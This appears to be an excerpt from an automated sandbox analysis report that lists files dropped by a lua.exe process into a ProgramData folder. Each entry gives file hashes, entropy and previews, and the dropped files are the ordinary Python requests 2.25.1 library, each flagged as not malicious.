SHA-256:	09E8A9BCEC8067104652C168685AB0931E7868F9C8284B66F5AE6EDAE5F1130B
SHA-512:	3705B1CE56DD19764B7B9E363936E36CBEB8309CEB0F36AAF94D7F9EF1DBD45BFF9DEADBB73EE7F56210703D5E199DCB4125744C3E459D2647FA15B2C0EB0B77
Malicious:	false
Preview:	. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests-2.25.1.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4168
Entropy (8bit):	5.29884502779965
Encrypted:	false
SSDEEP:	96:D/UGqofjaaxmPktxsxMnGg8BI7/dCStSsK9rQBG6lOtPoeEzNQXL:0ysMnGg8BI7FzwsKNMGzt3MNYL
MD5:	1C7624B9069568CB6ABCC291CC66B00A
SHA1:	2B16A43494BDC3C31B9B152126A36C172B7DD5FE
SHA-256:	46E361DFCB8DD0832C453DCEC1A4CD07F5B21B1E91330C10A0CC2E8D77E45153
SHA-512:	EDA8EA6E66B494C203E289A3571BBC7E2C510F9C3EC2D1411D0C44D6B099491CDA480FC62B8829E1352788E842D663370017788EFFC567E1F0AFF6DE873758E0
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: requests.Version: 2.25.1.Summary: Python HTTP for Humans..Home-page: https://requests.readthedocs.io.Author: Kenneth Reitz.Author-email: me@kennethreitz.org.License: Apache 2.0.Project-URL: Documentation, https://requests.readthedocs.io.Project-URL: Source, https://github.com/psf/requests.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Natural Language :: English.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programmin

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests-2.25.1.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2834
Entropy (8bit):	5.714092291889227
Encrypted:	false
SSDEEP:	48:WnuXsGeUGlG3G5JFGgWHGlFI3Fc7tfpXH9H4zsykFgrlRFyiFUTmt1H7euZpXzfh:5XsG+4IFUH8I3+7tf5H9H4zsngRRFyex
MD5:	249ACAFE36F24A65178C3AE5E1AF3586
SHA1:	DFE82EA01F6B7B56B562B80BDB44BB8FE89F4BAC
SHA-256:	0777969A7D335393A5A0DD63E69BC70F7FDA89306D88EC63E8283AC999A6D196
SHA-512:	34D8B9ADAA0BE57137131A62BE5CAC8CE92E23110A0DD48FDDAEB639038D0F36AE31D41597294C714CE66BA451349AF739F1B9B2D233BE2EE7FAC325E1954957
Malicious:	false
Preview:	requests-2.25.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..requests-2.25.1.dist-info/LICENSE,sha256=CeipvOyAZxBGUsFoaFqwkx54aPnIKEtm9a5u2uXxEws,10142..requests-2.25.1.dist-info/METADATA,sha256=RuNh38uN0IMsRT3OwaTNB_WyGx6RMwwQoMwujXfkUVM,4168..requests-2.25.1.dist-info/RECORD,,..requests-2.25.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..requests-2.25.1.dist-info/WHEEL,sha256=Z-nyYpwrcSqxfdux5Mbn_DQ525iP7J2DG3JgGvOYyTQ,110..requests-2.25.1.dist-info/top_level.txt,sha256=fMSVmHfb5rbGOo6xv-O_tUX6j-WyixssE-SnwcDRxNQ,9..requests/__init__.py,sha256=rsmg7xmbbCE_zmDcG6EDk_pyvdEfadztdBaWIkInlH8,4141..requests/__pycache__/__init__.cpython-37.pyc,,..requests/__pycache__/__version__.cpython-37.pyc,,..requests/__pycache__/_internal_utils.cpython-37.pyc,,..requests/__pycache__/adapters.cpython-37.pyc,,..requests/__pycache__/api.cpython-37.pyc,,..requests/__pycache__/auth.cpython-37.pyc,,..requests/__pycache__/certs.cpython-37.pyc,,..reques

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests-2.25.1.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlViHoKKjP+tPCCf7irO5S:RtBMwlViQWBBwt
MD5:	5BBA2AABC4A5D75E954C7EDF9834DE0A
SHA1:	407755EDC93510D5F7556ECDD1E7CB42F9357D8F
SHA-256:	67E9F2629C2B712AB17DDBB1E4C6E7FC3439DB988FEC9D831B72601AF398C934
SHA-512:	803B1181918FB2D93D2D2715D96E087E9333647C4A4A405D4FAD9DEDE0B77C8E3BCD5CAC7F3A426C60715202E2ECEBCD3EE9E066B2233A814A9A821D23BE88D0
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.36.2).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests-2.25.1.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9
Entropy (8bit):	2.725480556997868
Encrypted:	false
SSDEEP:	3:3Wo:3Wo
MD5:	197B4DEB87FFA3DECD9F045926A86CD0
SHA1:	5E482A8A1A830D55B849679AB26B23146E90CEB9
SHA-256:	7CC4959877DBE6B6C63A8EB1BFE3BFB545FA8FE5B28B1B2C13E4A7C1C0D1C4D4
SHA-512:	DB7A712DCE02422EA008BE64D2AB0B16765F8802EC7C276ABF6E4B533957B24E7CA23B816725CD9D881597709DEAF89927395274FB695387243B7AA5401EA776
Malicious:	false
Preview:	requests.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4141
Entropy (8bit):	4.963983313306089
Encrypted:	false
SSDEEP:	96:2peYVGivM4GNf2CFPIRjaxQKssHAQTjySi0sf:2bMbNuCsjax7s
MD5:	1257F424A82EC1AC4CF98FF637DBBF6C
SHA1:	391C9DFA59FE0622D60F7ACAE18331AE0DE88061
SHA-256:	AEC9A0EF199B6C213FCE60DC1BA10393FA72BDD11F69DCED741696224227947F
SHA-512:	9DB51FF7D190A850FE3FFB7F319BCCFD9B223423084476EF340ED70CAAB47AEA2DC85FF82D19EE3E8C3E6896ECEB2DB10E215F8BF302A4F6A43F4F17DCA1A1A4
Malicious:	false
Preview:	# -- coding: utf-8 --..# __.# /__) _ _ _ _ _/ _.# / ( (- (/ (/ (- _) / _).# /..""".Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2'). >>> r = requests.post('https://httpbin.org/post', data=payload). >>> print(r.text). {. .... "form": {. "key1": "value1",. "key2": "value2". },. .... }..The other HTTP methods are supported - see `requests.api`. Full documentation.is at <https://requests.readthedocs.io>...:copyright: (c) 2017 by Kenneth Reitz..:license: Apache 2.0, see LICENSE for more details.."""..import urllib3.import chardet.import warnings.from .exceptions import RequestsDependencyWarning...def check_compatibility(u

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\__version__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	441
Entropy (8bit):	4.8830163972404845
Encrypted:	false
SSDEEP:	6:SkRairD7AL2FySSI2XSRcpAUi3Yxt+XtBblzRsv2vK7a1Mdr7ARneAu6eOAQjCgS:PbfcXu7nsv2yu1Mp7ku6eObCgEFuU0Y
MD5:	0AEEB3179FC89D011CAE7BD1080743C6
SHA1:	E7110E33F433F52D0535592E99A752689B4C33F2
SHA-256:	93827C735C85445CF0196C2537B9A268339C945B5B708B351A59E64F5ED86D74
SHA-512:	44A2736AFD43C9B963760F01BCF72884484F6686C4EBC2740D659F366A94A9BE0A82187E6C905E0D8E59E23F518A26603CD906DACC26E610B3715F1A46CF1F03
Malicious:	false
Preview:	# .-. .-. .-. . . .-. .-. .-. .-..# \|( \|- \|.\| \| \| \|- `-. \| `-..# ' ' `-' `-`.`-' `-' `-' ' `-'..__title__ = 'requests'.__description__ = 'Python HTTP for Humans.'.__url__ = 'https://requests.readthedocs.io'.__version__ = '2.25.1'.__build__ = 0x022501.__author__ = 'Kenneth Reitz'.__author_email__ = 'me@kennethreitz.org'.__license__ = 'Apache 2.0'.__copyright__ = 'Copyright 2020 Kenneth Reitz'.__cake__ = u'\u2728 \U0001f370 \u2728'.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\_internal_utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1096
Entropy (8bit):	4.516324227351689
Encrypted:	false
SSDEEP:	24:lDfmQURGWkTP9+gioikIxmSNYIhARWr1OlX4N8oQSf8P:BmpGWIFCo8hvr1OlX4NlQs8P
MD5:	A99425AE18678A77B272542BDB253ADE
SHA1:	E906C93851DAF76973FF06DE80579A25BF71377A
SHA-256:	671DCF9C451C7327EC07E89ED759D95405BCA82949CB4831D6A34C13BAE04F5F
SHA-512:	CE85FE2662576F0AFA93C9335E4AE972CFE168F0A2D8FEAC4E5EC29D27B645E269751180D3404267F5BD8CCE98F0016E2C67DEEB79F3AACBC7FBD6F5E89B4EEC
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat)."""..from .compat import is_py2, builtin_str, str...def to_native_string(string, encoding='ascii'):. """Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. """. if isinstance(string, builtin_str):. out = string. else:. if is_py2:. out = string.encode(encoding). else:. out = string.decode(encoding).. return out...def unicode_is_ascii(u_string):. """Determine if unicode string only contains ASCII characters... :param str u_string: unicode string to check. Must be unicode. and not Python 2 `str`.. :rtype: bool. """. assert isinstance(u_string, str). try:. u

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\adapters.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21344
Entropy (8bit):	4.433290247231647
Encrypted:	false
SSDEEP:	384:vmkJw1rfAce6LgWjj858Y8WAmWWjoAhDnnJcvKuiJpwgeXRuxCAiB:1mtpe6Uq5LCvKvK7NeXRuxCAiB
MD5:	460488F3CF569C8943BAB515DB82BE6B
SHA1:	1855E643257C1AE0D34EA2FAAA672D5BEBD2D4DE
SHA-256:	59E95233504241775B8C4B83B01C6A283003798F011E6C65AF06CD9CB376AEBE
SHA-512:	5B11FD2A29ED8CFEC134B419E13B27EE89F566C88E30E90F96450B504C39F570C2CD2D3D14F05C9CBA75960B5BFA996EDEE33F637D5F5BA0F890D986D680D368
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.."""..import os.path.import socket..from urllib3.poolmanager import PoolManager, proxy_from_url.from urllib3.response import HTTPResponse.from urllib3.util import parse_url.from urllib3.util import Timeout as TimeoutSauce.from urllib3.util.retry import Retry.from urllib3.exceptions import ClosedPoolError.from urllib3.exceptions import ConnectTimeoutError.from urllib3.exceptions import HTTPError as _HTTPError.from urllib3.exceptions import MaxRetryError.from urllib3.exceptions import NewConnectionError.from urllib3.exceptions import ProxyError as _ProxyError.from urllib3.exceptions import ProtocolError.from urllib3.exceptions import ReadTimeoutError.from urllib3.exceptions import SSLError as _SSLError.from urllib3.exceptions import ResponseError.from urllib3.exceptions import LocationValueError..from .models import Response.f

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\api.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6496
Entropy (8bit):	4.80334791167039
Encrypted:	false
SSDEEP:	96:ifmGLluXWC7ZolNAzj8t8l8DeteOgj4UiQQ51UAQQIUDQQzQx:iuEoZjM8SqoN8xX51PXIcX0x
MD5:	436881E36D8E6468F5626DE2B95D93B3
SHA1:	D59147AB9CABCC8C771C1BA4609208024D805DE4
SHA-256:	3E51CCF874F73D0E65CAE7E8786995FA7271462ED49D4C86561ECE57B07D5D5E
SHA-512:	2A41C40F78E0FF65AD9A7A99ADED0ED2263407CE7D30157F785595121F3FAF94E33C8F0D5B55A425E8BD381F0D3D98022662B515D2B1659884D0CAEB09A6E7F8
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.."""..from . import sessions...def request(method, url, **kwargs):. """Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`.. :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`.. :param cookies: (optiona

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\auth.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10207
Entropy (8bit):	4.549683435530294
Encrypted:	false
SSDEEP:	192:OV7NQFSzkFV/w/zp67AMWva7pu6pCgkdIV914f4H9wX:Ch2SIP/0UFWv+HhkdIV979C
MD5:	1A21F3F8F2851B46F099FBCBD5748867
SHA1:	A4FF1EFAFC575773B4F225721CDF83C0EE81AB39
SHA-256:	38CA092152B244BCBD4C7AFDD72F2BC72B19B9C9703C1F8AD57835CC1A265214
SHA-512:	DC86643B6B2954F9758296045242A5F3178FAD77C4C0A15295194EE28F819EC7CA7D4D9FF0E43D6170DD907734082C34D136452170DFD244964933AED12C23CE
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.."""..import os.import re.import time.import hashlib.import threading.import warnings..from base64 import b64encode..from .compat import urlparse, str, basestring.from .cookies import extract_cookies_to_jar.from ._internal_utils import to_native_string.from .utils import parse_dict_header..CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded'.CONTENT_TYPE_MULTI_PART = 'multipart/form-data'...def _basic_auth_str(username, password):. """Returns a Basic Auth string.""".. # "I want us to put a big-ol' comment on top of it that. # says that this behaviour is dumb but we need to preserve. # it because people are relying on it.". # - Lukasa. #. # These are here solely to maintain backwards compatibility. # for things like ints. This will be removed in 3.0.0.. if not isinstance(username, basestring):. warnings.warn(.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\certs.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	453
Entropy (8bit):	4.8357697769038674
Encrypted:	false
SSDEEP:	12:HtcKyP1A3Dj4uIy1XfB4A4kvYa4ZkzfF2aGhu:mDgbXKAhwa970aN
MD5:	E15C9D52BEDDFBA17B72C885B5CD0F3F
SHA1:	FE826E4A37125ED326535B70CB9EB634F4B8B0EB
SHA-256:	74E079AD5D83675DDD121ABD0546BFE21779900AA0E7D7BFCD4641D347DA633F
SHA-512:	2EF3D30BE124FE7D795BC4316AF2750E689332AEB8BEBFAA4534CC7A5B200B511CAFFA0BAF58C737BD8FEA17D32AA87692E5BF84A9015A01845DB227E58D1ABE
Malicious:	false
Preview:	#!/usr/bin/env python.# -- coding: utf-8 --..""".requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle..""".from certifi import where..if __name__ == '__main__':. print(where()).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1782
Entropy (8bit):	4.744586798654895
Encrypted:	false
SSDEEP:	48:SXwpTkNXiDCgsZ3wLnCdd6soY7GkY9cI8soSYXQ:SApTK5JgLCdd6JGu9cI8JSAQ
MD5:	F5ED9B72695C1BFA2D51D9838C6EF691
SHA1:	7CF3FCF1B4FC9E0B80734AC668F4DA031B3DAB8D
SHA-256:	88146FBBE5F9E34087E0F26CBB1AF4BDC1939E5FD3661ABFEF94B099E72443BC
SHA-512:	2E59611816E3D4436C17A92CFF754CC59A97B599743C5186A912ECF2EBBD015E3A4A0439594D620C1CD5AC2601DE91A13D98DA79FC5BC5F412041583D87CCD05
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests.compat.~~~~~~~~~~~~~~~..This module handles import compatibility issues between Python 2 and.Python 3.."""..import chardet..import sys..# -------.# Pythons.# -------..# Syntax sugar.._ver = sys.version_info..#: Python 2.x?.is_py2 = (_ver[0] == 2)..#: Python 3.x?.is_py3 = (_ver[0] == 3)..try:. import simplejson as json.except ImportError:. import json..# ---------.# Specifics.# ---------..if is_py2:. from urllib import (. quote, unquote, quote_plus, unquote_plus, urlencode, getproxies,. proxy_bypass, proxy_bypass_environment, getproxies_environment). from urlparse import urlparse, urlunparse, urljoin, urlsplit, urldefrag. from urllib2 import parse_http_list. import cookielib. from Cookie import Morsel. from StringIO import StringIO. # Keep OrderedDict for backwards compatibility.. from collections import Callable, Mapping, MutableMapping, OrderedDict... builtin_str = str. bytes = str. str = unicod

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\cookies.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18430
Entropy (8bit):	4.49179208473673
Encrypted:	false
SSDEEP:	192:boXORpKUj5PLsaZcA83q20Fe6JUmYPteu4eQ50mqfsAXcGmysvBpAyEFEHuj:cXORcyAOceUvtNQymy8Bpv6E4
MD5:	9D61A7E703C15B12E785F2B4A243CF73
SHA1:	A5A73DDECF0723E9B25DA6E067BE2B9DFF6BA781
SHA-256:	63E6CA5FA4EF5B716762513A02ED125ED55559C68D745BEE030431C3E1B48932
SHA-512:	B6207C8C25B9B355C92B692DC3992A252691DB14DE18F0B273F989F15FA4FE0F1FE2672E6C5AD44A35698CFFE4F7B73959D430264FF086B63084B62A899DBA69
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `cookielib.CookieJar` with requests...requests.utils imports from here, so be careful with imports.."""..import copy.import time.import calendar..from ._internal_utils import to_native_string.from .compat import cookielib, urlparse, urlunparse, Morsel, MutableMapping..try:. import threading.except ImportError:. import dummy_threading as threading...class MockRequest(object):. """Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `cookielib.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of the request and the cookie... The original request object is read-only. The client is responsible for collecting. the new headers via `get_new_headers()` and interpreting them appropriately. You. probably want `get_cookie_header`, defined below.. """.. d

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\exceptions.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3161
Entropy (8bit):	4.8061640373914845
Encrypted:	false
SSDEEP:	48:DBlXcTeJMMiYop0zKiJ/tB+ZR15zyMb9i4p5PauJ2j5Clh8vNiN:DBlXMXMiYoSjfUv5zyyioDgjolWvAN
MD5:	8A8FB277810222B25DC146F83A6696D4
SHA1:	6956A68C020027B0292844C01FC20285CD146F3F
SHA-256:	C57A23D6B7619F14D2FC362984A67D3AF159250677DF703AE1111CF590D92205
SHA-512:	DFC7BE5B7D7EA2353155E72085DEC9DDFA1DCBFCB6A5FEBCC66FFCFB29E4C27FF12075E3A0DC6CB4BE85101367DDF9A798F44CF849A2616862371F1A6B855439
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions..""".from urllib3.exceptions import HTTPError as BaseHTTPError...class RequestException(IOError):. """There was an ambiguous exception that occurred while handling your. request.. """.. def __init__(self, args, kwargs):. """Initialize RequestException with `request` and `response` objects.""". response = kwargs.pop('response', None). self.response = response. self.request = kwargs.pop('request', None). if (response is not None and not self.request and. hasattr(response, 'request')):. self.request = self.response.request. super(RequestException, self).__init__(args, **kwargs)...class HTTPError(RequestException):. """An HTTP error occurred."""...class ConnectionError(RequestException):. """A Connection error occurred."""...class ProxyError(ConnectionError):. """A proxy error

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\help.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3515
Entropy (8bit):	4.5340250906991075
Encrypted:	false
SSDEEP:	96:9RSDYMh2QDB2erRxGLlK3ek/yaCa+OW0Lm/vgM:9R8kQtOQ3ekNCa+uCXgM
MD5:	4C5656AAEAA0607F09CA5DAEE3954EA0
SHA1:	F97715193310272DE1226FD6FC9874A9210A30F4
SHA-256:	94B701B4A01AAFC4FA4FBF1EF5373865F77F104245867B718226F524735CB442
SHA-512:	A197BF97FF7269B7D4BAD5B820B93FF7252128EF642DA39BEB22AED79DB24EEDA5C44CC190D41E9D5187B88D01F2C8B52B72F6A4881C5707B9D25202A88615CB
Malicious:	false
Preview:	"""Module containing bug report helper(s).""".from __future__ import print_function..import json.import platform.import sys.import ssl..import idna.import urllib3.import chardet..from . import __version__ as requests_version..try:. from urllib3.contrib import pyopenssl.except ImportError:. pyopenssl = None. OpenSSL = None. cryptography = None.else:. import OpenSSL. import cryptography...def _implementation():. """Return a dict with the Python implementation and version... Provide both the name and the version of the Python implementation. currently running. For example, on CPython 2.7.5 it will return. {'name': 'CPython', 'version': '2.7.5'}... This function works best on CPython and PyPy: in particular, it probably. doesn't work for Jython or IronPython. Future investigation should be done. to work out the correct shape of the code for those platforms.. """. implementation = platform.python_implementation().. if implementation == 'CPytho

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\hooks.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	757
Entropy (8bit):	4.590063497273193
Encrypted:	false
SSDEEP:	12:icKyPx1p4IoWy5pMUqTgeA12T/bxawBCFfy6nu6faa60IYKzYnhDXrY:lDx1qlJ5pMUqTghqCZy6nu6W0IYHBY
MD5:	E95D38CC4C7540B3F338AF0B106C823E
SHA1:	6E081C955EE08F9F533BF2856AC98F93906EF593
SHA-256:	411786CB2D1B45CAF9AE4C02B8E6CD6A46D8B1CEC492229E0701B8A877A4AF64
SHA-512:	4B70A50CFEBE753824F6C2C30850C6DE282CFB8601B73943019229AC045315DA19EF43E6381BD830C5133374E1C71FDCA0EC2AF3257F53ADA2B81147F7F164FE
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests.hooks.~~~~~~~~~~~~~~..This module provides the capabilities for the Requests hooks system...Available hooks:..``response``:. The response generated from a Request..""".HOOKS = ['response']...def default_hooks():. return {event: [] for event in HOOKS}..# TODO: response is the only one...def dispatch_hook(key, hooks, hook_data, kwargs):. """Dispatches a hook dictionary on a given piece of data.""". hooks = hooks or {}. hooks = hooks.get(key). if hooks:. if hasattr(hooks, '__call__'):. hooks = [hooks]. for hook in hooks:. _hook_data = hook(hook_data, kwargs). if _hook_data is not None:. hook_data = _hook_data. return hook_data.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\models.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	34308
Entropy (8bit):	4.39382194487087
Encrypted:	false
SSDEEP:	768:JBtrkZgO9VMkKNew7pp2aLjrFemL05pbw+NyaIu8:JfrAtakKNew7v2a305pU5
MD5:	68AF1C7FA20D50D121005F1208E053DD
SHA1:	3EFA34691B6A5B0CF0F54BE3E06BC99E322641CE
SHA-256:	5216F845AFEE6CD1817FEEA4B474A180EE6651208664A6B90FFC0B19508CB589
SHA-512:	F918182751B8F62B7F8626B867EE9A0FCD5EC376ABF4BF16E914D9AE7EE38DE04DC215FE9144A437955E320309D8A2AB8999C758433A5E029D19B3B996333EB8
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.."""..import datetime.import sys..# Import encoding now, to avoid implicit import later..# Implicit import within threads may cause LookupError when standard library is in a ZIP,.# such as in Embedded Python. See https://github.com/psf/requests/issues/3578..import encodings.idna..from urllib3.fields import RequestField.from urllib3.filepost import encode_multipart_formdata.from urllib3.util import parse_url.from urllib3.exceptions import (. DecodeError, ReadTimeoutError, ProtocolError, LocationParseError)..from io import UnsupportedOperation.from .hooks import default_hooks.from .structures import CaseInsensitiveDict..from .auth import HTTPBasicAuth.from .cookies import cookiejar_from_dict, get_cookie_header, _copy_cookie_jar.from .exceptions import (. HTTPError, MissingSchema, InvalidURL, ChunkedEncodingError,. ContentDecodingError, ConnectionError, Strea

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\packages.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	542
Entropy (8bit):	4.689694562255105
Encrypted:	false
SSDEEP:	12:kyxK21tfkpB7KvxayJk9W5B4XFKW88XCrmW6xIeL1J9Kx8cr0tU:kaQXk1BsKW8MkmWU1J9Kxhp
MD5:	D9278C04AA1DD897FE81F76A52897A63
SHA1:	BEB270857ACAD664E77D52A299DE41B979E0C4E6
SHA-256:	436AC5D0BE66737C1002F73AABF94056D3D30CE68E785803FBB9164902E48C44
SHA-512:	7EFAFB06DA91BBB800309404991479067C070F87FBF820DC3AB2844B27289F2E6FB88BF87AA160E798A9D67BBD065691A55897255D7BA0ED4735F04E2D96DBB7
Malicious:	false
Preview:	import sys..# This code exists for backwards compatibility reasons..# I don't like it either. Just look the other way. :)..for package in ('urllib3', 'idna', 'chardet'):. locals()[package] = __import__(package). # This traversal is apparently necessary such that the identities are. # preserved (requests.packages.urllib3.* is urllib3.*). for mod in list(sys.modules):. if mod == package or mod.startswith(package + '.'):. sys.modules['requests.packages.' + mod] = sys.modules[mod]..# Kinda cool, though, right?.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\sessions.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	30137
Entropy (8bit):	4.508643582451891
Encrypted:	false
SSDEEP:	384:AVZsmL6nfw+Ytqqw+LihBX5J+ulMSh2unj6ld99uVDppeYyFpyUb4tDhaBUaemo7:AVZ3LfPRLiDHMSh2G6r9WPAJ4GSl
MD5:	913EFDFDDA01ACAA3E0BB953A856A00B
SHA1:	109DF12E18F0D8E070A9D346370865C484C87EEF
SHA-256:	06C9D1FB36082E0A05CC9EB2AB84FC86DFE2D0FC303C6540C56C56695E5D7078
SHA-512:	43FE03D319995D8DB15254498331F45351680B20339E28543E3DFC90678A2A3F919F70ADFE4A1F0696C52906ED79AB89D5EBBBA733D86A82288AC0ED250AA68D
Malicious:	false
Preview:	# -- coding: utf-8 --..""".requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies)..""".import os.import sys.import time.from datetime import timedelta.from collections import OrderedDict..from .auth import _basic_auth_str.from .compat import cookielib, is_py3, urljoin, urlparse, Mapping.from .cookies import (. cookiejar_from_dict, extract_cookies_to_jar, RequestsCookieJar, merge_cookies).from .models import Request, PreparedRequest, DEFAULT_REDIRECT_LIMIT.from .hooks import default_hooks, dispatch_hook.from ._internal_utils import to_native_string.from .utils import to_key_val_list, default_headers, DEFAULT_PORTS.from .exceptions import (. TooManyRedirects, InvalidSchema, ChunkedEncodingError, ContentDecodingError)..from .structures import CaseInsensitiveDict.from .adapters import HTTPAdapter..from .utils import (. requote_uri, get_environ_proxies, get_netrc_auth, should_bypass_proxie

C:\ProgramData\ShellExperienceHost\Lib\site-packages\requests\status_codes.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4188
Entropy (8bit):	4.851057456018198
Encrypted:	false
SSDEEP:	96:8aXQ/ywPMZY1KKc2qfweZ9IpRC0sHleEdyoBaFOh:uymMac2HeZ9IpRCiEAW
MD5:	F5BCA2603D8660BDFE7F156557B9811C
SHA1:	830246289FE3B9456BB9078C546F82FF0AA88B1C
SHA-256:	813EFD3DBB3F7108C1829F9FBEB520835767D8340EDF66C38F84C89E39CC3D27
